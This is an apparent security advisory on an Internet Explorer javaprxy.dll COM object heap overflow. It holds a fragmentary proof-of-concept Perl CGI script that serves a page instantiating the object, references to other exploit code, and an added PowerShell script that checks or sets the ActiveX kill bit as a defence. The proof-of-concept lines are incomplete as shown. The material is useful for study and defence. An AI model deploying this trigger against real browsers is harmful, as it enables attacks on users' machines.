Microsoft Internet Explorer Javaprxy.DLL COM Object Instantiation Heap Overflow Vulnerability
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following proof-of-concept CGI script was provided to demonstrate the vulnerability. An additional proof of concept (javaprxy.pl) is made available by FrSIRT:
# in order for this to work javaprxy.dll must be available on the client.
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll
my $html1 = "<html><body>\n<object
my $html2 = "\n</body><script>location.reload();</script></html>\n";
print "Content-Type: text/html;\r\n\r\n";
Exploit code javaprxy_exp.c has been provided by K.K.Senthil Velan <email@example.com>.
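As a defender-side addition that is not part of the original advisory: the standard Internet Explorer mitigation for a vulnerable COM object is the ActiveX kill bit, a "Compatibility Flags" DWORD of 0x400 under the ActiveX Compatibility key for that CLSID. The script below reports whether the kill bit is set for the javaprxy.dll CLSID quoted above and, with -Apply, sets it; the registry path and flag value come from Microsoft's documented kill-bit mechanism rather than from this page, and an administrative PowerShell session is assumed.

```powershell
# Added example, not from the advisory: check or set the ActiveX kill bit for the
# javaprxy.dll CLSID. Registry location and the 0x400 flag are Microsoft's
# documented kill-bit mechanism (assumed here, not taken from this page).
param([switch]$Apply)

$Clsid   = '{03D9F3F2-B0E3-11D2-B081-006008039BF0}'   # javaprxy.dll, from the advisory
$KillBit = 0x400                                        # kill-bit compatibility flag
$KeyPath = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

function Get-KillBitState {
    # Returns 'absent' (no key/value), 'clear' (value present, bit not set) or 'set'.
    param([string]$Path, [int]$Flag)
    if (-not (Test-Path $Path)) { return 'absent' }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return 'absent' }
    if (($flags -band $Flag) -eq $Flag) { return 'set' }
    return 'clear'
}

$state = Get-KillBitState -Path $KeyPath -Flag $KillBit
Write-Output "Kill bit for $Clsid : $state"

if ($Apply -and $state -ne 'set') {
    # Create the key if needed and OR in the kill bit, preserving any other flags.
    New-Item -Path $KeyPath -Force | Out-Null
    $existing = (Get-ItemProperty -Path $KeyPath -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = ([int]$existing) -bor $KillBit
    Set-ItemProperty -Path $KeyPath -Name 'Compatibility Flags' -Value $new -Type DWord
    Write-Output ("Kill bit applied (Compatibility Flags = 0x{0:X})" -f $new)
}
```

On 64-bit Windows the 32-bit browser reads the same value under HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility, so repeat the check against that path as well.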